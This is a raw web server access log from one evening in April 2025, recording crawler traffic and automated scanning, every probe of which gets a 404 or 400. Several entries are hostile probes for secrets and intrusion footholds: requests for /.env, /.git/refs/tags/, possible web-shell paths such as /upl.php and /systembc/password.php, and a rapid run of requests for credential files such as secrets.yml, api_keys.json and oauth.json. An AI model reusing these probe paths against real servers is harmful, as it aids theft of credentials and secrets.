151.106.160.158 - - [10/Apr/2025:19:59:45 +0200] "GET /cron.php?cron_type=tidy_cache&sid=3c4180198e356e76b1eb949b0f0b78fb HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.160.158 - - [10/Apr/2025:19:59:45 +0200] "GET /cron.php?cron_type=tidy_cache&sid=3c4180198e356e76b1eb949b0f0b78fb HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.160.158 - - [10/Apr/2025:19:59:45 +0200] "GET /cron.php?cron_type=tidy_cache&sid=3c4180198e356e76b1eb949b0f0b78fb HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.164.42 - - [10/Apr/2025:20:02:04 +0200] "GET /download/file.php?id=243&sid=e6e7f181764da48e1242e13aab208120 HTTP/1.1" 404 297 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.164.42 - - [10/Apr/2025:20:02:05 +0200] "GET /download/file.php?id=243&sid=e6e7f181764da48e1242e13aab208120 HTTP/1.1" 404 297 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.164.42 - - [10/Apr/2025:20:02:05 +0200] "GET /download/file.php?id=243&sid=e6e7f181764da48e1242e13aab208120 HTTP/1.1" 404 297 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.169.76 - - [10/Apr/2025:20:02:54 +0200] "GET /cron.php?cron_type=tidy_cache&sid=0b10bbd7f91d4e20603718398a441d82 HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.169.76 - - [10/Apr/2025:20:02:54 +0200] "GET /cron.php?cron_type=tidy_cache&sid=0b10bbd7f91d4e20603718398a441d82 HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.169.76 - - [10/Apr/2025:20:02:55 +0200] "GET /cron.php?cron_type=tidy_cache&sid=0b10bbd7f91d4e20603718398a441d82 HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
161.35.103.180 - - [10/Apr/2025:20:03:20 +0200] "\x16\x03\x01" 400 383 "-" "-"
161.35.103.180 - - [10/Apr/2025:20:03:20 +0200] "\x16\x03\x01" 400 383 "-" "-"
161.35.103.180 - - [10/Apr/2025:20:03:20 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
161.35.103.180 - - [10/Apr/2025:20:03:20 +0200] "GET /form.html HTTP/1.1" 404 283 "-" "curl/8.1.2"
161.35.103.180 - - [10/Apr/2025:20:03:21 +0200] "GET /upl.php HTTP/1.1" 404 282 "-" "Mozilla/5.0"
161.35.103.180 - - [10/Apr/2025:20:03:21 +0200] "GET /t4 HTTP/1.1" 404 278 "-" "Mozilla/5.0"
161.35.103.180 - - [10/Apr/2025:20:03:21 +0200] "GET /geoip/ HTTP/1.1" 404 281 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
161.35.103.180 - - [10/Apr/2025:20:03:21 +0200] "GET /favicon.ico HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
151.106.184.192 - - [10/Apr/2025:20:03:22 +0200] "GET /download/file.php?id=256&sid=2c0e7ab5bba410fa0975d81fbd02071e HTTP/1.1" 404 297 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
161.35.103.180 - - [10/Apr/2025:20:03:22 +0200] "GET /1.php HTTP/1.1" 404 280 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
161.35.103.180 - - [10/Apr/2025:20:03:22 +0200] "GET /systembc/password.php HTTP/1.1" 404 291 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
151.106.184.192 - - [10/Apr/2025:20:03:22 +0200] "GET /download/file.php?id=256&sid=2c0e7ab5bba410fa0975d81fbd02071e HTTP/1.1" 404 297 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.184.192 - - [10/Apr/2025:20:03:22 +0200] "GET /download/file.php?id=256&sid=2c0e7ab5bba410fa0975d81fbd02071e HTTP/1.1" 404 297 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
161.35.103.180 - - [10/Apr/2025:20:03:22 +0200] "GET /password.php HTTP/1.1" 404 285 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
196.251.70.87 - - [10/Apr/2025:20:03:23 +0200] "GET /.git/refs/tags/ HTTP/1.1" 404 287 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.27 (KHTML, like Gecko) Chrome/12.0.712.0 Safari/534.27"
151.106.164.217 - - [10/Apr/2025:20:05:06 +0200] "GET /cron.php?cron_type=tidy_cache&sid=2bba4e2f058c7358adf0721acecefa21 HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.164.217 - - [10/Apr/2025:20:05:06 +0200] "GET /cron.php?cron_type=tidy_cache&sid=2bba4e2f058c7358adf0721acecefa21 HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.164.217 - - [10/Apr/2025:20:05:07 +0200] "GET /cron.php?cron_type=tidy_cache&sid=2bba4e2f058c7358adf0721acecefa21 HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.176.244 - - [10/Apr/2025:20:07:20 +0200] "GET /styles/Factions/theme/images/tabstrip_abeco.png HTTP/1.1" 404 317 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.176.244 - - [10/Apr/2025:20:07:20 +0200] "GET /styles/Factions/theme/images/tabstrip_abeco.png HTTP/1.1" 404 317 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.176.244 - - [10/Apr/2025:20:07:21 +0200] "GET /styles/Factions/theme/images/tabstrip_abeco.png HTTP/1.1" 404 317 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.162.8 - - [10/Apr/2025:20:10:18 +0200] "GET /cron.php?cron_type=tidy_cache&sid=4b1e3303d8d6d342cefebf89e4644a1f HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.162.8 - - [10/Apr/2025:20:10:18 +0200] "GET /cron.php?cron_type=tidy_cache&sid=4b1e3303d8d6d342cefebf89e4644a1f HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.162.8 - - [10/Apr/2025:20:10:18 +0200] "GET /cron.php?cron_type=tidy_cache&sid=4b1e3303d8d6d342cefebf89e4644a1f HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
154.81.156.10 - - [10/Apr/2025:20:15:50 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
151.106.183.52 - - [10/Apr/2025:20:24:14 +0200] "GET /download/file.php?id=254&sid=669dcccb4fff914fd75ea914085b5814 HTTP/1.1" 404 297 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.183.52 - - [10/Apr/2025:20:24:14 +0200] "GET /download/file.php?id=254&sid=669dcccb4fff914fd75ea914085b5814 HTTP/1.1" 404 297 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.183.52 - - [10/Apr/2025:20:24:15 +0200] "GET /download/file.php?id=254&sid=669dcccb4fff914fd75ea914085b5814 HTTP/1.1" 404 297 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
156.59.198.135 - - [10/Apr/2025:20:24:33 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/12251503.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
154.81.156.34 - - [10/Apr/2025:20:30:50 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
154.81.156.54 - - [10/Apr/2025:20:33:28 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
151.106.186.76 - - [10/Apr/2025:20:37:20 +0200] "GET /cron.php?cron_type=tidy_cache&sid=0f64fe90cf396c8cf44e2d5639b35cca HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.186.76 - - [10/Apr/2025:20:37:20 +0200] "GET /cron.php?cron_type=tidy_cache&sid=0f64fe90cf396c8cf44e2d5639b35cca HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.186.76 - - [10/Apr/2025:20:37:21 +0200] "GET /cron.php?cron_type=tidy_cache&sid=0f64fe90cf396c8cf44e2d5639b35cca HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.164.127 - - [10/Apr/2025:20:38:17 +0200] "GET /cron.php?cron_type=tidy_cache&sid=2a133120d46c12403196601afea1d85f HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.164.127 - - [10/Apr/2025:20:38:18 +0200] "GET /cron.php?cron_type=tidy_cache&sid=2a133120d46c12403196601afea1d85f HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.164.127 - - [10/Apr/2025:20:38:18 +0200] "GET /cron.php?cron_type=tidy_cache&sid=2a133120d46c12403196601afea1d85f HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
154.81.156.54 - - [10/Apr/2025:20:40:13 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
118.40.125.130 - - [10/Apr/2025:20:43:51 +0200] "GET / HTTP/1.0" 200 423 "-" "curl/7.88.1"
151.106.191.138 - - [10/Apr/2025:20:49:21 +0200] "GET /images/smilies/emptyglass.png HTTP/1.1" 404 305 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.191.138 - - [10/Apr/2025:20:49:21 +0200] "GET /images/smilies/emptyglass.png HTTP/1.1" 404 305 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.191.138 - - [10/Apr/2025:20:49:21 +0200] "GET /images/smilies/emptyglass.png HTTP/1.1" 404 305 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.183.52 - - [10/Apr/2025:20:52:56 +0200] "GET /download/file.php?id=255&sid=8c77e9a8f2ab2cc1834857dee98702e5 HTTP/1.1" 404 297 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.183.52 - - [10/Apr/2025:20:52:56 +0200] "GET /download/file.php?id=255&sid=8c77e9a8f2ab2cc1834857dee98702e5 HTTP/1.1" 404 297 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.183.52 - - [10/Apr/2025:20:52:56 +0200] "GET /download/file.php?id=255&sid=8c77e9a8f2ab2cc1834857dee98702e5 HTTP/1.1" 404 297 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
156.59.198.136 - - [10/Apr/2025:20:56:02 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/12423089.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
47.128.49.100 - - [10/Apr/2025:20:56:12 +0200] "GET /robots.txt HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
47.128.57.197 - - [10/Apr/2025:20:56:24 +0200] "GET /robots.txt HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
154.81.156.35 - - [10/Apr/2025:20:56:57 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
156.59.198.136 - - [10/Apr/2025:21:00:19 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11224858.pdf HTTP/1.0" 404 321 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [10/Apr/2025:21:00:28 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/12090530.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
151.106.165.204 - - [10/Apr/2025:21:02:17 +0200] "GET /download/file.php?id=252&sid=a6c29f9c9b19b7ac724fedc72513089e HTTP/1.1" 404 297 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.165.204 - - [10/Apr/2025:21:02:18 +0200] "GET /download/file.php?id=252&sid=a6c29f9c9b19b7ac724fedc72513089e HTTP/1.1" 404 297 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.165.204 - - [10/Apr/2025:21:02:18 +0200] "GET /download/file.php?id=252&sid=a6c29f9c9b19b7ac724fedc72513089e HTTP/1.1" 404 297 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
154.81.156.54 - - [10/Apr/2025:21:04:52 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
156.59.198.135 - - [10/Apr/2025:21:13:24 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/12002319.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [10/Apr/2025:21:13:33 +0200] "GET /renault.2web.at/htdocs/binaries/10009029.pdf HTTP/1.0" 404 307 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [10/Apr/2025:21:13:42 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11482909.pdf HTTP/1.0" 404 321 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
154.81.156.10 - - [10/Apr/2025:21:18:04 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
151.106.164.53 - - [10/Apr/2025:21:19:14 +0200] "GET /cron.php?cron_type=tidy_cache&sid=b8daae22256838e13e7d0a35a1fa76d8 HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.164.53 - - [10/Apr/2025:21:19:14 +0200] "GET /cron.php?cron_type=tidy_cache&sid=b8daae22256838e13e7d0a35a1fa76d8 HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.164.53 - - [10/Apr/2025:21:19:15 +0200] "GET /cron.php?cron_type=tidy_cache&sid=b8daae22256838e13e7d0a35a1fa76d8 HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.169.76 - - [10/Apr/2025:21:23:28 +0200] "GET /cron.php?cron_type=tidy_cache&sid=8a75a84d55c60a7f5e9c3d6c8703755a HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.169.76 - - [10/Apr/2025:21:23:28 +0200] "GET /cron.php?cron_type=tidy_cache&sid=8a75a84d55c60a7f5e9c3d6c8703755a HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.169.76 - - [10/Apr/2025:21:23:29 +0200] "GET /cron.php?cron_type=tidy_cache&sid=8a75a84d55c60a7f5e9c3d6c8703755a HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
156.59.198.135 - - [10/Apr/2025:21:23:46 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11504676.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
151.106.168.134 - - [10/Apr/2025:21:29:02 +0200] "GET /cron.php?cron_type=tidy_cache&sid=e6e7f181764da48e1242e13aab208120 HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.168.134 - - [10/Apr/2025:21:29:03 +0200] "GET /cron.php?cron_type=tidy_cache&sid=e6e7f181764da48e1242e13aab208120 HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.168.134 - - [10/Apr/2025:21:29:03 +0200] "GET /cron.php?cron_type=tidy_cache&sid=e6e7f181764da48e1242e13aab208120 HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
154.81.156.54 - - [10/Apr/2025:21:29:49 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
156.59.198.135 - - [10/Apr/2025:21:32:19 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/10883839.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [10/Apr/2025:21:32:28 +0200] "GET /docs/ecommlogistics/belege/RE2016.PDF HTTP/1.0" 404 303 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
196.251.81.239 - - [10/Apr/2025:21:37:17 +0200] "GET /.env HTTP/1.1" 404 280 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3800.0 Iron Safari/537.36"
156.59.198.136 - - [10/Apr/2025:21:42:33 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11483325.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [10/Apr/2025:21:51:14 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/12433438.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [10/Apr/2025:21:51:23 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/12467000.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
154.81.156.54 - - [10/Apr/2025:21:57:21 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
154.81.156.34 - - [10/Apr/2025:21:57:32 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
156.59.198.136 - - [10/Apr/2025:21:59:47 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11043558.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [10/Apr/2025:22:00:08 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11054461.pdf HTTP/1.0" 404 321 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [10/Apr/2025:22:01:17 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/12022133.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
60.205.229.204 - - [10/Apr/2025:22:03:26 +0200] "GET / HTTP/1.1" 200 274 "-" "Linux Gnu (cow)"
45.148.10.35 - - [10/Apr/2025:22:05:56 +0200] "\x16\x03\x01" 400 383 "-" "-"
45.148.10.35 - - [10/Apr/2025:22:05:56 +0200] "GET / HTTP/1.1" 400 383 "-" "-"
45.148.10.35 - - [10/Apr/2025:22:05:56 +0200] "GET / HTTP/1.1" 200 423 "-" "l9tcpid/v1.1.0"
45.148.10.35 - - [10/Apr/2025:22:05:56 +0200] "GET /config/security.ini HTTP/1.1" 404 291 "-" "l9explore/1.2.2"
45.148.10.35 - - [10/Apr/2025:22:05:56 +0200] "GET /config.xml HTTP/1.1" 404 285 "-" "l9explore/1.2.2"
45.148.10.35 - - [10/Apr/2025:22:05:56 +0200] "GET /src/config/api_keys.json HTTP/1.1" 404 295 "-" "l9explore/1.2.2"
45.148.10.35 - - [10/Apr/2025:22:05:56 +0200] "GET /automation/oauth.json HTTP/1.1" 404 290 "-" "l9explore/1.2.2"
45.148.10.35 - - [10/Apr/2025:22:05:56 +0200] "GET /tests/auth_config.ini HTTP/1.1" 404 291 "-" "l9explore/1.2.2"
45.148.10.35 - - [10/Apr/2025:22:05:56 +0200] "GET /config/secrets.yml HTTP/1.1" 404 290 "-" "l9explore/1.2.2"
45.148.10.35 - - [10/Apr/2025:22:05:56 +0200] "GET /environments/dev/config.yaml HTTP/1.1" 404 297 "-" "l9explore/1.2.2"
45.148.10.35 - - [10/Apr/2025:22:05:57 +0200] "GET /services/api/auth.yaml HTTP/1.1" 404 291 "-" "l9explore/1.2.2"
45.148.10.35 - - [10/Apr/2025:22:05:57 +0200] "GET /db/auth_config.json HTTP/1.1" 404 291 "-" "l9explore/1.2.2"
45.148.10.35 - - [10/Apr/2025:22:05:57 +0200] "GET /secrets/oauth.json HTTP/1.1" 404 289 "-" "l9explore/1.2.2"
45.148.10.35 - - [10/Apr/2025:22:05:57 +0200] "GET /auth.json HTTP/1.1" 404 283 "-" "l9explore/1.2.2"
45.148.10.35 - - [10/Apr/2025:22:05:57 +0200] "GET /secrets.py HTTP/1.1" 404 284 "-" "l9explore/1.2.2"
45.148.10.35 - - [10/Apr/2025:22:05:57 +0200] "GET /environments/prod/settings.json HTTP/1.1" 404 298 "-" "l9explore/1.2.2"
45.148.10.35 - - [10/Apr/2025:22:05:57 +0200] "GET /etc/app/config.ini HTTP/1.1" 404 290 "-" "l9explore/1.2.2"
45.148.10.35 - - [10/Apr/2025:22:05:57 +0200] "GET /config/keys.yaml HTTP/1.1" 404 290 "-" "l9explore/1.2.2"
45.148.10.35 - - [10/Apr/2025:22:05:57 +0200] "GET /config/staging.yaml HTTP/1.1" 404 291 "-" "l9explore/1.2.2"
45.148.10.35 - - [10/Apr/2025:22:05:57 +0200] "GET /app/secrets/oauth.yaml HTTP/1.1" 404 292 "-" "l9explore/1.2.2"
45.148.10.35 - - [10/Apr/2025:22:05:57 +0200] "GET /secrets/integration_auth.yaml HTTP/1.1" 404 297 "-" "l9explore/1.2.2"
45.148.10.35 - - [10/Apr/2025:22:05:57 +0200] "GET /src/auth/config.yaml HTTP/1.1" 404 292 "-" "l9explore/1.2.2"
45.148.10.35 - - [10/Apr/2025:22:05:57 +0200] "GET /secrets/auth.yaml HTTP/1.1" 404 288 "-" "l9explore/1.2.2"
45.148.10.35 - - [10/Apr/2025:22:05:57 +0200] "GET /config/auth_override.json HTTP/1.1" 404 295 "-" "l9explore/1.2.2"
45.148.10.35 - - [10/Apr/2025:22:05:57 +0200] "GET /auth/provider_config.yaml HTTP/1.1" 404 296 "-" "l9explore/1.2.2"
45.148.10.35 - - [10/Apr/2025:22:05:57 +0200] "GET /config/credentials.yml HTTP/1.1" 404 293 "-" "l9explore/1.2.2"
45.148.10.35 - - [10/Apr/2025:22:05:57 +0200] "GET /db/settings.ini HTTP/1.1" 404 287 "-" "l9explore/1.2.2"
45.148.10.35 - - [10/Apr/2025:22:05:57 +0200] "GET /scripts/auth_settings.yaml HTTP/1.1" 404 296 "-" "l9explore/1.2.2"
45.148.10.35 - - [10/Apr/2025:22:05:57 +0200] "GET /scripts/secrets.yaml HTTP/1.1" 404 291 "-" "l9explore/1.2.2"
45.148.10.35 - - [10/Apr/2025:22:05:58 +0200] "GET /config/local.yaml HTTP/1.1" 404 290 "-" "l9explore/1.2.2"
45.148.10.35 - - [10/Apr/2025:22:05:58 +0200] "GET /config/azure_auth.yaml HTTP/1.1" 404 294 "-" "l9explore/1.2.2"
